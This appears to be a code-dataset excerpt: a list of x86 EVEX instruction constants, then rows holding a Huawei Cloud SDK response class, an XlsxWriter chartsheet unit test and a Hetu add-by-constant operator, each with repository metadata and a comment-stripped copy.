EVEX_VADDPH_XMM_K1Z_XMM_XMMM128B16: int = 4323
EVEX_VADDPH_YMM_K1Z_YMM_YMMM256B16: int = 4324
EVEX_VADDPH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4325
EVEX_VADDSH_XMM_K1Z_XMM_XMMM16_ER: int = 4326
EVEX_VCMPPH_KR_K1_XMM_XMMM128B16_IMM8: int = 4327
EVEX_VCMPPH_KR_K1_YMM_YMMM256B16_IMM8: int = 4328
EVEX_VCMPPH_KR_K1_ZMM_ZMMM512B16_IMM8_SAE: int = 4329
EVEX_VCMPSH_KR_K1_XMM_XMMM16_IMM8_SAE: int = 4330
EVEX_VCOMISH_XMM_XMMM16_SAE: int = 4331
EVEX_VCVTDQ2PH_XMM_K1Z_XMMM128B32: int = 4332
EVEX_VCVTDQ2PH_XMM_K1Z_YMMM256B32: int = 4333
EVEX_VCVTDQ2PH_YMM_K1Z_ZMMM512B32_ER: int = 4334
EVEX_VCVTPD2PH_XMM_K1Z_XMMM128B64: int = 4335
EVEX_VCVTPD2PH_XMM_K1Z_YMMM256B64: int = 4336
EVEX_VCVTPD2PH_XMM_K1Z_ZMMM512B64_ER: int = 4337
EVEX_VCVTPH2DQ_XMM_K1Z_XMMM64B16: int = 4338
EVEX_VCVTPH2DQ_YMM_K1Z_XMMM128B16: int = 4339
EVEX_VCVTPH2DQ_ZMM_K1Z_YMMM256B16_ER: int = 4340
EVEX_VCVTPH2PD_XMM_K1Z_XMMM32B16: int = 4341
EVEX_VCVTPH2PD_YMM_K1Z_XMMM64B16: int = 4342
EVEX_VCVTPH2PD_ZMM_K1Z_XMMM128B16_SAE: int = 4343
EVEX_VCVTPH2PSX_XMM_K1Z_XMMM64B16: int = 4344
EVEX_VCVTPH2PSX_YMM_K1Z_XMMM128B16: int = 4345
EVEX_VCVTPH2PSX_ZMM_K1Z_YMMM256B16_SAE: int = 4346
EVEX_VCVTPH2QQ_XMM_K1Z_XMMM32B16: int = 4347
EVEX_VCVTPH2QQ_YMM_K1Z_XMMM64B16: int = 4348
EVEX_VCVTPH2QQ_ZMM_K1Z_XMMM128B16_ER: int = 4349
EVEX_VCVTPH2UDQ_XMM_K1Z_XMMM64B16: int = 4350
EVEX_VCVTPH2UDQ_YMM_K1Z_XMMM128B16: int = 4351
EVEX_VCVTPH2UDQ_ZMM_K1Z_YMMM256B16_ER: int = 4352
EVEX_VCVTPH2UQQ_XMM_K1Z_XMMM32B16: int = 4353
EVEX_VCVTPH2UQQ_YMM_K1Z_XMMM64B16: int = 4354
EVEX_VCVTPH2UQQ_ZMM_K1Z_XMMM128B16_ER: int = 4355
EVEX_VCVTPH2UW_XMM_K1Z_XMMM128B16: int = 4356
EVEX_VCVTPH2UW_YMM_K1Z_YMMM256B16: int = 4357
EVEX_VCVTPH2UW_ZMM_K1Z_ZMMM512B16_ER: int = 4358
EVEX_VCVTPH2W_XMM_K1Z_XMMM128B16: int = 4359
EVEX_VCVTPH2W_YMM_K1Z_YMMM256B16: int = 4360
EVEX_VCVTPH2W_ZMM_K1Z_ZMMM512B16_ER: int = 4361
EVEX_VCVTPS2PHX_XMM_K1Z_XMMM128B32: int = 4362
EVEX_VCVTPS2PHX_XMM_K1Z_YMMM256B32: int = 4363
EVEX_VCVTPS2PHX_YMM_K1Z_ZMMM512B32_ER: int = 4364
EVEX_VCVTQQ2PH_XMM_K1Z_XMMM128B64: int = 4365
EVEX_VCVTQQ2PH_XMM_K1Z_YMMM256B64: int = 4366
EVEX_VCVTQQ2PH_XMM_K1Z_ZMMM512B64_ER: int = 4367
EVEX_VCVTSD2SH_XMM_K1Z_XMM_XMMM64_ER: int = 4368
EVEX_VCVTSH2SD_XMM_K1Z_XMM_XMMM16_SAE: int = 4369
EVEX_VCVTSH2SI_R32_XMMM16_ER: int = 4370
EVEX_VCVTSH2SI_R64_XMMM16_ER: int = 4371
EVEX_VCVTSH2SS_XMM_K1Z_XMM_XMMM16_SAE: int = 4372
EVEX_VCVTSH2USI_R32_XMMM16_ER: int = 4373
EVEX_VCVTSH2USI_R64_XMMM16_ER: int = 4374
EVEX_VCVTSI2SH_XMM_XMM_RM32_ER: int = 4375
EVEX_VCVTSI2SH_XMM_XMM_RM64_ER: int = 4376
EVEX_VCVTSS2SH_XMM_K1Z_XMM_XMMM32_ER: int = 4377
EVEX_VCVTTPH2DQ_XMM_K1Z_XMMM64B16: int = 4378
EVEX_VCVTTPH2DQ_YMM_K1Z_XMMM128B16: int = 4379
EVEX_VCVTTPH2DQ_ZMM_K1Z_YMMM256B16_SAE: int = 4380
EVEX_VCVTTPH2QQ_XMM_K1Z_XMMM32B16: int = 4381
EVEX_VCVTTPH2QQ_YMM_K1Z_XMMM64B16: int = 4382
EVEX_VCVTTPH2QQ_ZMM_K1Z_XMMM128B16_SAE: int = 4383
EVEX_VCVTTPH2UDQ_XMM_K1Z_XMMM64B16: int = 4384
EVEX_VCVTTPH2UDQ_YMM_K1Z_XMMM128B16: int = 4385
EVEX_VCVTTPH2UDQ_ZMM_K1Z_YMMM256B16_SAE: int = 4386
EVEX_VCVTTPH2UQQ_XMM_K1Z_XMMM32B16: int = 4387
EVEX_VCVTTPH2UQQ_YMM_K1Z_XMMM64B16: int = 4388
EVEX_VCVTTPH2UQQ_ZMM_K1Z_XMMM128B16_SAE: int = 4389
EVEX_VCVTTPH2UW_XMM_K1Z_XMMM128B16: int = 4390
EVEX_VCVTTPH2UW_YMM_K1Z_YMMM256B16: int = 4391
EVEX_VCVTTPH2UW_ZMM_K1Z_ZMMM512B16_SAE: int = 4392
EVEX_VCVTTPH2W_XMM_K1Z_XMMM128B16: int = 4393
EVEX_VCVTTPH2W_YMM_K1Z_YMMM256B16: int = 4394
EVEX_VCVTTPH2W_ZMM_K1Z_ZMMM512B16_SAE: int = 4395
EVEX_VCVTTSH2SI_R32_XMMM16_SAE: int = 4396
EVEX_VCVTTSH2SI_R64_XMMM16_SAE: int = 4397
EVEX_VCVTTSH2USI_R32_XMMM16_SAE: int = 4398
EVEX_VCVTTSH2USI_R64_XMMM16_SAE: int = 4399
EVEX_VCVTUDQ2PH_XMM_K1Z_XMMM128B32: int = 4400
EVEX_VCVTUDQ2PH_XMM_K1Z_YMMM256B32: int = 4401
EVEX_VCVTUDQ2PH_YMM_K1Z_ZMMM512B32_ER: int = 4402
EVEX_VCVTUQQ2PH_XMM_K1Z_XMMM128B64: int = 4403
EVEX_VCVTUQQ2PH_XMM_K1Z_YMMM256B64: int = 4404
EVEX_VCVTUQQ2PH_XMM_K1Z_ZMMM512B64_ER: int = 4405
EVEX_VCVTUSI2SH_XMM_XMM_RM32_ER: int = 4406
EVEX_VCVTUSI2SH_XMM_XMM_RM64_ER: int = 4407
EVEX_VCVTUW2PH_XMM_K1Z_XMMM128B16: int = 4408
EVEX_VCVTUW2PH_YMM_K1Z_YMMM256B16: int = 4409
EVEX_VCVTUW2PH_ZMM_K1Z_ZMMM512B16_ER: int = 4410
EVEX_VCVTW2PH_XMM_K1Z_XMMM128B16: int = 4411
EVEX_VCVTW2PH_YMM_K1Z_YMMM256B16: int = 4412
EVEX_VCVTW2PH_ZMM_K1Z_ZMMM512B16_ER: int = 4413
EVEX_VDIVPH_XMM_K1Z_XMM_XMMM128B16: int = 4414
EVEX_VDIVPH_YMM_K1Z_YMM_YMMM256B16: int = 4415
EVEX_VDIVPH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4416
EVEX_VDIVSH_XMM_K1Z_XMM_XMMM16_ER: int = 4417
EVEX_VFCMADDCPH_XMM_K1Z_XMM_XMMM128B32: int = 4418
EVEX_VFCMADDCPH_YMM_K1Z_YMM_YMMM256B32: int = 4419
EVEX_VFCMADDCPH_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 4420
EVEX_VFMADDCPH_XMM_K1Z_XMM_XMMM128B32: int = 4421
EVEX_VFMADDCPH_YMM_K1Z_YMM_YMMM256B32: int = 4422
EVEX_VFMADDCPH_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 4423
EVEX_VFCMADDCSH_XMM_K1Z_XMM_XMMM32_ER: int = 4424
EVEX_VFMADDCSH_XMM_K1Z_XMM_XMMM32_ER: int = 4425
EVEX_VFCMULCPH_XMM_K1Z_XMM_XMMM128B32: int = 4426
EVEX_VFCMULCPH_YMM_K1Z_YMM_YMMM256B32: int = 4427
EVEX_VFCMULCPH_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 4428
EVEX_VFMULCPH_XMM_K1Z_XMM_XMMM128B32: int = 4429
EVEX_VFMULCPH_YMM_K1Z_YMM_YMMM256B32: int = 4430
EVEX_VFMULCPH_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 4431
EVEX_VFCMULCSH_XMM_K1Z_XMM_XMMM32_ER: int = 4432
EVEX_VFMULCSH_XMM_K1Z_XMM_XMMM32_ER: int = 4433
EVEX_VFMADDSUB132PH_XMM_K1Z_XMM_XMMM128B16: int = 4434
EVEX_VFMADDSUB132PH_YMM_K1Z_YMM_YMMM256B16: int = 4435
EVEX_VFMADDSUB132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4436
EVEX_VFMADDSUB213PH_XMM_K1Z_XMM_XMMM128B16: int = 4437
EVEX_VFMADDSUB213PH_YMM_K1Z_YMM_YMMM256B16: int = 4438
EVEX_VFMADDSUB213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4439
EVEX_VFMADDSUB231PH_XMM_K1Z_XMM_XMMM128B16: int = 4440
EVEX_VFMADDSUB231PH_YMM_K1Z_YMM_YMMM256B16: int = 4441
EVEX_VFMADDSUB231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4442
EVEX_VFMSUBADD132PH_XMM_K1Z_XMM_XMMM128B16: int = 4443
EVEX_VFMSUBADD132PH_YMM_K1Z_YMM_YMMM256B16: int = 4444
EVEX_VFMSUBADD132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4445
EVEX_VFMSUBADD213PH_XMM_K1Z_XMM_XMMM128B16: int = 4446
EVEX_VFMSUBADD213PH_YMM_K1Z_YMM_YMMM256B16: int = 4447
EVEX_VFMSUBADD213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4448
EVEX_VFMSUBADD231PH_XMM_K1Z_XMM_XMMM128B16: int = 4449
EVEX_VFMSUBADD231PH_YMM_K1Z_YMM_YMMM256B16: int = 4450
EVEX_VFMSUBADD231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4451
EVEX_VFMADD132PH_XMM_K1Z_XMM_XMMM128B16: int = 4452
EVEX_VFMADD132PH_YMM_K1Z_YMM_YMMM256B16: int = 4453
EVEX_VFMADD132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4454
EVEX_VFMADD213PH_XMM_K1Z_XMM_XMMM128B16: int = 4455
EVEX_VFMADD213PH_YMM_K1Z_YMM_YMMM256B16: int = 4456
EVEX_VFMADD213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4457
EVEX_VFMADD231PH_XMM_K1Z_XMM_XMMM128B16: int = 4458
EVEX_VFMADD231PH_YMM_K1Z_YMM_YMMM256B16: int = 4459
EVEX_VFMADD231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4460
EVEX_VFNMADD132PH_XMM_K1Z_XMM_XMMM128B16: int = 4461
EVEX_VFNMADD132PH_YMM_K1Z_YMM_YMMM256B16: int = 4462
EVEX_VFNMADD132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4463
EVEX_VFNMADD213PH_XMM_K1Z_XMM_XMMM128B16: int = 4464
EVEX_VFNMADD213PH_YMM_K1Z_YMM_YMMM256B16: int = 4465
EVEX_VFNMADD213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4466
EVEX_VFNMADD231PH_XMM_K1Z_XMM_XMMM128B16: int = 4467
EVEX_VFNMADD231PH_YMM_K1Z_YMM_YMMM256B16: int = 4468
EVEX_VFNMADD231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4469
EVEX_VFMADD132SH_XMM_K1Z_XMM_XMMM16_ER: int = 4470
EVEX_VFMADD213SH_XMM_K1Z_XMM_XMMM16_ER: int = 4471
EVEX_VFMADD231SH_XMM_K1Z_XMM_XMMM16_ER: int = 4472
EVEX_VFNMADD132SH_XMM_K1Z_XMM_XMMM16_ER: int = 4473
EVEX_VFNMADD213SH_XMM_K1Z_XMM_XMMM16_ER: int = 4474
EVEX_VFNMADD231SH_XMM_K1Z_XMM_XMMM16_ER: int = 4475
EVEX_VFMSUB132PH_XMM_K1Z_XMM_XMMM128B16: int = 4476
EVEX_VFMSUB132PH_YMM_K1Z_YMM_YMMM256B16: int = 4477
EVEX_VFMSUB132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4478
EVEX_VFMSUB213PH_XMM_K1Z_XMM_XMMM128B16: int = 4479
EVEX_VFMSUB213PH_YMM_K1Z_YMM_YMMM256B16: int = 4480
EVEX_VFMSUB213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4481
EVEX_VFMSUB231PH_XMM_K1Z_XMM_XMMM128B16: int = 4482
EVEX_VFMSUB231PH_YMM_K1Z_YMM_YMMM256B16: int = 4483
EVEX_VFMSUB231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4484
EVEX_VFNMSUB132PH_XMM_K1Z_XMM_XMMM128B16: int = 4485
EVEX_VFNMSUB132PH_YMM_K1Z_YMM_YMMM256B16: int = 4486
EVEX_VFNMSUB132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4487
EVEX_VFNMSUB213PH_XMM_K1Z_XMM_XMMM128B16: int = 4488
EVEX_VFNMSUB213PH_YMM_K1Z_YMM_YMMM256B16: int = 4489
EVEX_VFNMSUB213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4490
EVEX_VFNMSUB231PH_XMM_K1Z_XMM_XMMM128B16: int = 4491
EVEX_VFNMSUB231PH_YMM_K1Z_YMM_YMMM256B16: int = 4492
EVEX_VFNMSUB231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4493
EVEX_VFMSUB132SH_XMM_K1Z_XMM_XMMM16_ER: int = 4494
EVEX_VFMSUB213SH_XMM_K1Z_XMM_XMMM16_ER: int = 4495
EVEX_VFMSUB231SH_XMM_K1Z_XMM_XMMM16_ER: int = 4496
EVEX_VFNMSUB132SH_XMM_K1Z_XMM_XMMM16_ER: int = 4497
EVEX_VFNMSUB213SH_XMM_K1Z_XMM_XMMM16_ER: int = 4498
EVEX_VFNMSUB231SH_XMM_K1Z_XMM_XMMM16_ER: int = 4499
EVEX_VFPCLASSPH_KR_K1_XMMM128B16_IMM8: int = 4500
EVEX_VFPCLASSPH_KR_K1_YMMM256B16_IMM8: int = 4501
EVEX_VFPCLASSPH_KR_K1_ZMMM512B16_IMM8: int = 4502
EVEX_VFPCLASSSH_KR_K1_XMMM16_IMM8: int = 4503
EVEX_VGETEXPPH_XMM_K1Z_XMMM128B16: int = 4504
EVEX_VGETEXPPH_YMM_K1Z_YMMM256B16: int = 4505
EVEX_VGETEXPPH_ZMM_K1Z_ZMMM512B16_SAE: int = 4506
EVEX_VGETEXPSH_XMM_K1Z_XMM_XMMM16_SAE: int = 4507
EVEX_VGETMANTPH_XMM_K1Z_XMMM128B16_IMM8: int = 4508
EVEX_VGETMANTPH_YMM_K1Z_YMMM256B16_IMM8: int = 4509
EVEX_VGETMANTPH_ZMM_K1Z_ZMMM512B16_IMM8_SAE: int = 4510
EVEX_VGETMANTSH_XMM_K1Z_XMM_XMMM16_IMM8_SAE: int = 4511
EVEX_VMAXPH_XMM_K1Z_XMM_XMMM128B16: int = 4512
EVEX_VMAXPH_YMM_K1Z_YMM_YMMM256B16: int = 4513
EVEX_VMAXPH_ZMM_K1Z_ZMM_ZMMM512B16_SAE: int = 4514
EVEX_VMAXSH_XMM_K1Z_XMM_XMMM16_SAE: int = 4515
EVEX_VMINPH_XMM_K1Z_XMM_XMMM128B16: int = 4516
EVEX_VMINPH_YMM_K1Z_YMM_YMMM256B16: int = 4517
EVEX_VMINPH_ZMM_K1Z_ZMM_ZMMM512B16_SAE: int = 4518
EVEX_VMINSH_XMM_K1Z_XMM_XMMM16_SAE: int = 4519
EVEX_VMOVSH_XMM_K1Z_M16: int = 4520
EVEX_VMOVSH_M16_K1_XMM: int = 4521
EVEX_VMOVSH_XMM_K1Z_XMM_XMM: int = 4522
EVEX_VMOVSH_XMM_K1Z_XMM_XMM_MAP5_11: int = 4523
EVEX_VMOVW_XMM_R32M16: int = 4524
EVEX_VMOVW_XMM_R64M16: int = 4525
EVEX_VMOVW_R32M16_XMM: int = 4526
EVEX_VMOVW_R64M16_XMM: int = 4527
EVEX_VMULPH_XMM_K1Z_XMM_XMMM128B16: int = 4528
EVEX_VMULPH_YMM_K1Z_YMM_YMMM256B16: int = 4529
EVEX_VMULPH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4530
EVEX_VMULSH_XMM_K1Z_XMM_XMMM16_ER: int = 4531
EVEX_VRCPPH_XMM_K1Z_XMMM128B16: int = 4532
EVEX_VRCPPH_YMM_K1Z_YMMM256B16: int = 4533
EVEX_VRCPPH_ZMM_K1Z_ZMMM512B16: int = 4534
EVEX_VRCPSH_XMM_K1Z_XMM_XMMM16: int = 4535
EVEX_VREDUCEPH_XMM_K1Z_XMMM128B16_IMM8: int = 4536
EVEX_VREDUCEPH_YMM_K1Z_YMMM256B16_IMM8: int = 4537
EVEX_VREDUCEPH_ZMM_K1Z_ZMMM512B16_IMM8_SAE: int = 4538
EVEX_VREDUCESH_XMM_K1Z_XMM_XMMM16_IMM8_SAE: int = 4539
EVEX_VRNDSCALEPH_XMM_K1Z_XMMM128B16_IMM8: int = 4540
EVEX_VRNDSCALEPH_YMM_K1Z_YMMM256B16_IMM8: int = 4541
EVEX_VRNDSCALEPH_ZMM_K1Z_ZMMM512B16_IMM8_SAE: int = 4542
EVEX_VRNDSCALESH_XMM_K1Z_XMM_XMMM16_IMM8_SAE: int = 4543
EVEX_VRSQRTPH_XMM_K1Z_XMMM128B16: int = 4544
EVEX_VRSQRTPH_YMM_K1Z_YMMM256B16: int = 4545
EVEX_VRSQRTPH_ZMM_K1Z_ZMMM512B16: int = 4546
EVEX_VRSQRTSH_XMM_K1Z_XMM_XMMM16: int = 4547
EVEX_VSCALEFPH_XMM_K1Z_XMM_XMMM128B16: int = 4548
EVEX_VSCALEFPH_YMM_K1Z_YMM_YMMM256B16: int = 4549
EVEX_VSCALEFPH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4550
EVEX_VSCALEFSH_XMM_K1Z_XMM_XMMM16_ER: int = 4551
EVEX_VSQRTPH_XMM_K1Z_XMMM128B16: int = 4552
EVEX_VSQRTPH_YMM_K1Z_YMMM256B16: int = 4553
EVEX_VSQRTPH_ZMM_K1Z_ZMMM512B16_ER: int = 4554
EVEX_VSQRTSH_XMM_K1Z_XMM_XMMM16_ER: int = 4555
EVEX_VSUBPH_XMM_K1Z_XMM_XMMM128B16: int = 4556
EVEX_VSUBPH_YMM_K1Z_YMM_YMMM256B16: int = 4557
EVEX_VSUBPH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4558
EVEX_VSUBSH_XMM_K1Z_XMM_XMMM16_ER: int = 4559
EVEX_VUCOMISH_XMM_XMMM16_SAE: int = 4560
RDUDBG: int = 4561
WRUDBG: int = 4562
| true | true |
f725f62d736217414f7205feb40dc8ce94818614 | 4,955 | py | Python | huaweicloud-sdk-bssintl/huaweicloudsdkbssintl/v2/model/show_customer_order_details_response.py | githubmilesma/huaweicloud-sdk-python-v3 | 9d9449ed68a609ca65f0aa50b5b2a1c28445bf03 | [
"Apache-2.0"
] | 1 | 2021-04-16T07:59:28.000Z | 2021-04-16T07:59:28.000Z | huaweicloud-sdk-bssintl/huaweicloudsdkbssintl/v2/model/show_customer_order_details_response.py | Lencof/huaweicloud-sdk-python-v3 | d13dc4e2830a83e295be6e4de021999b3376e34e | [
"Apache-2.0"
] | null | null | null | huaweicloud-sdk-bssintl/huaweicloudsdkbssintl/v2/model/show_customer_order_details_response.py | Lencof/huaweicloud-sdk-python-v3 | d13dc4e2830a83e295be6e4de021999b3376e34e | [
"Apache-2.0"
] | 1 | 2022-01-17T02:24:18.000Z | 2022-01-17T02:24:18.000Z | # coding: utf-8
import pprint
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
class ShowCustomerOrderDetailsResponse(SdkResponse):
    """Response model for the "show customer order details" API.

    Auto-generated style model object: ``openapi_types`` maps attribute
    names to their declared types and ``attribute_map`` maps attribute
    names to the JSON keys used on the wire.
    """

    # Attributes whose values must be masked as "****" in to_dict() output.
    sensitive_list = []

    openapi_types = {
        'total_count': 'int',
        'order_info': 'CustomerOrderV2',
        'order_line_items': 'list[OrderLineItemEntityV2]'
    }

    attribute_map = {
        'total_count': 'total_count',
        'order_info': 'order_info',
        'order_line_items': 'order_line_items'
    }

    def __init__(self, total_count=None, order_info=None, order_line_items=None):
        """Initialise the response, assigning only the fields that were given.

        :param total_count: Total number of records matching the query.
        :param order_info: The order itself (a ``CustomerOrderV2``).
        :param order_line_items: Line items belonging to the order
            (list of ``OrderLineItemEntityV2``).
        """
        super().__init__()

        self._total_count = None
        self._order_info = None
        self._order_line_items = None
        self.discriminator = None

        # Go through the property setters only for fields that were supplied,
        # so omitted fields stay None.
        if total_count is not None:
            self.total_count = total_count
        if order_info is not None:
            self.order_info = order_info
        if order_line_items is not None:
            self.order_line_items = order_line_items

    @property
    def total_count(self):
        """Total number of records matching the query."""
        return self._total_count

    @total_count.setter
    def total_count(self, total_count):
        """Set the total number of records matching the query."""
        self._total_count = total_count

    @property
    def order_info(self):
        """Details of the order (``CustomerOrderV2``)."""
        return self._order_info

    @order_info.setter
    def order_info(self, order_info):
        """Set the details of the order."""
        self._order_info = order_info

    @property
    def order_line_items(self):
        """Order line items (list of ``OrderLineItemEntityV2``)."""
        return self._order_line_items

    @order_line_items.setter
    def order_line_items(self, order_line_items):
        """Set the order line items."""
        self._order_line_items = order_line_items

    def to_dict(self):
        """Return the model's properties as a plain dict.

        Nested model objects are converted recursively via their own
        ``to_dict``; attributes listed in ``sensitive_list`` are masked.
        """
        def _convert(item):
            # Recurse into nested model objects, pass plain values through.
            return item.to_dict() if hasattr(item, "to_dict") else item

        result = {}
        for attr in self.openapi_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = [_convert(item) for item in value]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {
                    key: _convert(val) for key, val in value.items()
                }
            elif attr in self.sensitive_list:
                result[attr] = "****"
            else:
                result[attr] = value
        return result

    def to_str(self):
        """Return a pretty-printed string representation of the model."""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`."""
        return self.to_str()

    def __eq__(self, other):
        """Two responses are equal iff they share the type and all state."""
        return (
            isinstance(other, ShowCustomerOrderDetailsResponse)
            and self.__dict__ == other.__dict__
        )

    def __ne__(self, other):
        """Inverse of :meth:`__eq__`."""
        return not self == other
| 30.398773 | 99 | 0.618769 |
import pprint
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
class ShowCustomerOrderDetailsResponse(SdkResponse):
sensitive_list = []
openapi_types = {
'total_count': 'int',
'order_info': 'CustomerOrderV2',
'order_line_items': 'list[OrderLineItemEntityV2]'
}
attribute_map = {
'total_count': 'total_count',
'order_info': 'order_info',
'order_line_items': 'order_line_items'
}
def __init__(self, total_count=None, order_info=None, order_line_items=None):
super().__init__()
self._total_count = None
self._order_info = None
self._order_line_items = None
self.discriminator = None
if total_count is not None:
self.total_count = total_count
if order_info is not None:
self.order_info = order_info
if order_line_items is not None:
self.order_line_items = order_line_items
@property
def total_count(self):
return self._total_count
@total_count.setter
def total_count(self, total_count):
self._total_count = total_count
@property
def order_info(self):
return self._order_info
@order_info.setter
def order_info(self, order_info):
self._order_info = order_info
@property
def order_line_items(self):
return self._order_line_items
@order_line_items.setter
def order_line_items(self, order_line_items):
self._order_line_items = order_line_items
def to_dict(self):
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
return pprint.pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, ShowCustomerOrderDetailsResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true | true |
f725f695763bfd4fc762cb3bc2d1ac57a86e383c | 811 | py | Python | xlsxwriter/test/chartsheet/test_initialisation.py | haiyangd/XlsxWriter | 81f8c9435b3e03a1458bf9ba314b5d3f7508290f | [
"BSD-2-Clause-FreeBSD"
] | 3 | 2018-02-26T12:31:41.000Z | 2020-10-10T14:14:11.000Z | xlsxwriter/test/chartsheet/test_initialisation.py | haiyangd/XlsxWriter | 81f8c9435b3e03a1458bf9ba314b5d3f7508290f | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | xlsxwriter/test/chartsheet/test_initialisation.py | haiyangd/XlsxWriter | 81f8c9435b3e03a1458bf9ba314b5d3f7508290f | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2017, John McNamara, jmcnamara@cpan.org
#
import unittest
from ...compatibility import StringIO
from ...chartsheet import Chartsheet
class TestInitialisation(unittest.TestCase):
    """
    Verify that a Chartsheet can be constructed and one of its XML
    writer methods produces the expected output.
    """

    def setUp(self):
        # Route the chartsheet's output into an in-memory buffer.
        self.fh = StringIO()
        self.chartsheet = Chartsheet()
        self.chartsheet._set_filehandle(self.fh)

    def test_xml_declaration(self):
        """Chartsheet._xml_declaration() writes the standard XML prolog."""
        self.chartsheet._xml_declaration()

        expected = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n"""
        self.assertEqual(self.fh.getvalue(), expected)
| 24.575758 | 79 | 0.591862 | true | true | |
f725f82a65e7831844437922f04c35e5f5cd1ffc | 1,577 | py | Python | python/hetu/gpu_ops/AddConst.py | HugoZHL/Hetu | 51b0aa3d3deeb9c7a5c8e57aecec7b641db750af | [
"Apache-2.0"
] | null | null | null | python/hetu/gpu_ops/AddConst.py | HugoZHL/Hetu | 51b0aa3d3deeb9c7a5c8e57aecec7b641db750af | [
"Apache-2.0"
] | null | null | null | python/hetu/gpu_ops/AddConst.py | HugoZHL/Hetu | 51b0aa3d3deeb9c7a5c8e57aecec7b641db750af | [
"Apache-2.0"
] | 1 | 2021-08-01T09:05:20.000Z | 2021-08-01T09:05:20.000Z | from __future__ import absolute_import
from .Node import Op
from .._base import DNNL_LIB
from ..cpu_links import matrix_elementwise_add_by_const as cpu_matrix_elementwise_add_by_const
from ..gpu_links import matrix_elementwise_add_by_const
class AddByConstOp(Op):
    """Elementwise addition of a scalar constant to a single input node."""

    def __init__(self, node_A, const_val, ctx=None):
        super().__init__(AddByConstOp, [node_A], ctx)
        # Scalar added to every element of the input.
        self.const_attr = const_val

    @property
    def desc(self):
        """Human-readable description: ``name(input_name, const)``."""
        return f"{self.name}({self.inputs[0].name}, {self.const_attr})"

    def compute(self, input_vals, output_val, stream_handle=None):
        """Write ``input + const`` into ``output_val`` on the op's device."""
        if not self.on_cpu:
            matrix_elementwise_add_by_const(
                input_vals[0], self.const_attr, output_val, stream_handle)
            return
        # CPU path: prefer the DNNL kernel, fall back to numpy.
        if DNNL_LIB['DnnlMatrixElementwiseAddByConst']:
            cpu_matrix_elementwise_add_by_const(
                input_vals[0], self.const_attr, output_val)
        else:
            output_val[:] = input_vals[0].asnumpy() + self.const_attr

    def gradient(self, output_grad):
        """Adding a constant is identity w.r.t. the input gradient."""
        return [output_grad]

    def infer_shape(self, input_shapes):
        """Output shape equals the (single) input shape."""
        assert len(input_shapes) == 1
        return input_shapes[0]
def addbyconst_op(node, const_val, ctx=None):
    """Create an :class:`AddByConstOp` adding ``const_val`` to ``node``.

    Parameters
    ----------
    node : Node
        The node whose output the constant is added to.
    const_val : scalar value
        The constant value to be added.
    ctx : optional
        Device context for the new op.

    Returns
    -------
    A new Node instance created by Op.
    """
    return AddByConstOp(node, const_val, ctx=ctx)
| 30.326923 | 94 | 0.660748 | from __future__ import absolute_import
from .Node import Op
from .._base import DNNL_LIB
from ..cpu_links import matrix_elementwise_add_by_const as cpu_matrix_elementwise_add_by_const
from ..gpu_links import matrix_elementwise_add_by_const
class AddByConstOp(Op):
def __init__(self, node_A, const_val, ctx=None):
super().__init__(AddByConstOp, [node_A], ctx)
self.const_attr = const_val
@property
def desc(self):
return self.name + '(%s, %s)' % (self.inputs[0].name, str(self.const_attr))
def compute(self, input_vals, output_val, stream_handle=None):
if self.on_cpu:
if DNNL_LIB['DnnlMatrixElementwiseAddByConst']:
cpu_matrix_elementwise_add_by_const(
input_vals[0], self.const_attr, output_val)
else:
output_val[:] = input_vals[0].asnumpy() + self.const_attr
else:
matrix_elementwise_add_by_const(
input_vals[0], self.const_attr, output_val, stream_handle)
def gradient(self, output_grad):
return [output_grad]
def infer_shape(self, input_shapes):
assert len(input_shapes) == 1
return input_shapes[0]
def addbyconst_op(node, const_val, ctx=None):
return AddByConstOp(node, const_val, ctx=ctx)
| true | true |
